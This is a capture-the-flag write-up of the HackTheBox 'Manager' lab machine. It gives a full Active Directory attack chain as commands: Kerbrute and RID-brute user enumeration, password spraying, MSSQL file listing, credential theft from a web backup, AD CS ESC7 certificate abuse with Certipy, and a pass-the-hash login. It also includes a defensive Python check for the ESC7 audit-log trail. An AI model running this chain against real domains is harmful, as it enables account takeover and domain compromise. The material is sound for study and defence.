Manager – HackTheBox Writeup
Machine Name: Manager
IP: 10.10.11.236
Difficulty: Medium
Summary
Manager is a medium-difficulty machine that starts with enumerating usernames and password spraying them to log in to an MSSQL shell. The MSSQL shell was used to fetch a configuration file containing user credentials, which were used to obtain the user shell. Privilege escalation consisted of abusing an Active Directory Certificate Services (AD CS) misconfiguration to issue an administrator certificate, which was used to obtain the TGT hash and authenticate as administrator.
Information Gathering
The Nmap scan shows that DNS (53), HTTP (80 and 8080), Kerberos (88, 464), MSRPC (135, 593), SMB (139, 445), LDAP (389, 636, 3268, 3269), and MSSQL (1433) are open.
This is evidently a Windows machine, as it is running Kerberos, SMB, and LDAP. Since the domain revealed is “manager.htb”, I’ll add it to my hosts file.
I checked the web server on port 80 and didn’t find anything interesting. On Windows machines I usually check contact pages for usernames, but there was nothing there either.
I’ll run directory enumeration in the background while I enumerate the other ports.
ffuf -u http://manager.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc all -ac -o dir_ffuf.txt
I tried to enumerate users with rpcclient and Impacket’s lookupsid, but neither returned any information.
rpcclient -U "" -N 10.10.11.236
rpcclient $> enumdomusers
impacket-lookupsid -no-pass manager.htb
Enumerating for Users
Next, I tried running Kerbrute and found the usernames!
kerbrute -d manager.htb --dc manager.htb userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
The same can be achieved with crackmapexec by brute-forcing RID values.
crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
I saved the usernames in a file.
ryan
guest
cheng
raven
administrator
operator
Password Spraying
We can now perform a password spray with crackmapexec using the list of users we’ve just gathered.
crackmapexec smb manager.htb -u users.txt -p users.txt
The password for user “operator” is the same as the username.
Gaining a User Shell
The next logical step is to check whether these credentials work for the MSSQL login.
impacket-mssqlclient manager.htb/operator:operator@manager.htb -dc-ip dc01.manager.htb -windows-auth
Whenever I obtain access to a database shell, I either look for credentials or check whether the shell can run OS commands. Since I couldn’t find anything interesting in the database, I checked whether “xp_cmdshell” is enabled.
USE master;
-- Check who is allowed to run xp_cmdshell
EXEC sp_helprotect 'xp_cmdshell';
-- Check whether it is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
Unfortunately, “xp_cmdshell” wasn’t enabled. I also checked whether “xp_dirtree” is enabled, which would let me list files on the filesystem, and found that it was.
I found a backup file called “website-backup-27-07-23-old.zip” in the “C:\inetpub\wwwroot” directory.
EXEC xp_dirtree 'C:\inetpub\wwwroot'
Files in “C:\inetpub\wwwroot” are served by the web server as its document root, so I checked whether this file could be downloaded publicly, and indeed it could.
wget http://10.10.11.236/website-backup-27-07-23-old.zip
I proceeded to unzip the file and found a configuration file called “.old-conf.xml” that contains the credentials for the user raven.
unzip website-backup-27-07-23-old.zip
cat .old-conf.xml
I was able to log in as raven using Evil-WinRM and fetch the user flag!
evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
Privilege Escalation
Privilege escalation on Windows machines is usually about abusing misconfigured privileges. The first command I ran was “whoami /all”, which showed that raven belongs to the “Certificate Service DCOM Access” group.
whoami /all
Exploiting Active Directory Certificate Services (AD CS)
AD CS is responsible for issuing certificates, which are digitally signed documents that can be used for encryption, message signing, and authentication. An application can use a key pair to verify the identity of a user. Certificate Authorities (CAs) are responsible for issuing the certificates.
A client generates a key pair and sends a certificate signing request (CSR) to a CA server. The CA checks that the requested certificate template exists and that the user is allowed to enroll in it. If the CSR meets the CA’s requirements, the CA generates a certificate and signs it with its private key. Finally, the client stores the certificate in the Windows certificate store and uses it for encryption, message signing, or authentication (our goal).
AD CS misconfigurations can be abused in various ways, from gaining unauthorized privileges to full domain escalation.
A tool called Certipy lets us find vulnerable certificate templates and CA configurations.
pip install certipy-ad
certipy
certipy find -vulnerable -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
cat 20231102023419_Certipy.txt
The output reveals that user raven has the Enroll, ManageCertificates, and ManageCA access rights on the CA. These are exactly the prerequisites for the ESC7 attack described on the HackTricks page.
ESC7 Vulnerability
Since raven has the ManageCA and Enroll rights, the user can grant themselves the ManageCertificates permission and then issue failed certificate requests. The idea is to request a certificate from the SubCA template as raven with the administrator’s UPN; the CA denies the request, because only administrators can enroll in that template, but the certificate manager then issues the failed request anyway, producing a certificate for administrator that can be used to fetch the administrator’s TGT hash.
Following that attack flow, I ran the commands below.
First, I granted raven the ManageCertificates access right by adding raven as a new officer.
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Then, I enabled the SubCA template on the CA.
certipy ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -enable-template 'SubCA'
Now that the prerequisites are in place, raven can request a certificate based on the SubCA template, specifying the administrator’s UPN.
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
As expected, the request is denied; Certipy saves the private key and reports the request ID (13).
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
With the ManageCA and ManageCertificates rights, raven issues the failed certificate request, and can then retrieve it.
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
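The sequence above leaves a distinctive trail in the CA’s own audit log: the request is denied (event 4888) and the same request ID is later issued (4887), with a UPN that does not match the requester (adding the officer and enabling the template show up as 4890 and 4891). As an added example that is not part of this writeup or of Certipy, here is a small Python check over constructed CA audit records that flags this pattern; the dictionary field names are assumptions, and Certification Services auditing must be enabled on the CA for these events to exist at all.

```python
from collections import defaultdict

# Constructed sample CA audit records for this example (not real logs). Windows CA
# auditing emits 4886 (request received), 4887 (request issued) and 4888 (request
# denied); the field names used here are assumptions, not the Windows event schema.
EVENTS = [
    {"id": 4886, "request_id": 12, "requester": "MANAGER\\cheng", "upn": "cheng@manager.htb"},
    {"id": 4887, "request_id": 12, "requester": "MANAGER\\cheng", "upn": "cheng@manager.htb"},
    {"id": 4886, "request_id": 13, "requester": "MANAGER\\raven", "upn": "administrator@manager.htb"},
    {"id": 4888, "request_id": 13, "requester": "MANAGER\\raven", "upn": "administrator@manager.htb"},
    {"id": 4887, "request_id": 13, "requester": "MANAGER\\raven", "upn": "administrator@manager.htb"},
]


def account(name):
    """Reduce 'MANAGER\\raven' or 'administrator@manager.htb' to the bare account name."""
    return name.split("\\")[-1].split("@")[0].lower()


def find_esc7_candidates(events):
    """Return requests that were denied and later issued anyway, grouped by request ID.

    The ESC7 flow leaves exactly this trail: the CA denies the request (4888) because the
    requester may not enroll in the template, and a certificate manager then pushes the
    same request ID through (4887). A UPN naming an account other than the requester is
    the strongest signal, so it is reported separately.
    """
    by_request = defaultdict(list)
    for ev in events:                      # keep events in log order per request
        by_request[ev["request_id"]].append(ev)

    findings = []
    for request_id, evs in sorted(by_request.items()):
        denied_at = [i for i, ev in enumerate(evs) if ev["id"] == 4888]
        if not denied_at:
            continue
        if not any(ev["id"] == 4887 for ev in evs[denied_at[0] + 1:]):
            continue                       # denied but never issued: normal behaviour
        requester = account(evs[0]["requester"])
        upn_user = account(evs[0]["upn"])
        findings.append({"request_id": request_id, "requester": requester,
                         "upn_user": upn_user, "upn_mismatch": requester != upn_user})
    return findings


if __name__ == "__main__":
    for f in find_esc7_candidates(EVENTS):
        flag = " (UPN MISMATCH)" if f["upn_mismatch"] else ""
        print(f"request {f['request_id']}: {f['requester']} -> {f['upn_user']}{flag}")
```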
With the “administrator.pfx” certificate, we can authenticate as administrator and fetch the TGT.
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
Initially I received an error because the time on the target differed from the time on my machine (Kerberos rejects requests when the clocks are more than a few minutes apart).
I resolved it by synchronizing my machine’s clock with the target’s.
sudo apt-get install rdate
sudo rdate -n manager.htb
Finally, I got the hash for administrator!
I used this hash to log in as Administrator using Evil-WinRM and obtained the root flag.
evil-winrm -i manager.htb -u administrator -H 'ae5064c2f62317332c88629e025924ef'
I highly recommend reading the GitHub page of Certipy to understand all the attacks related to AD CS.
Pwned!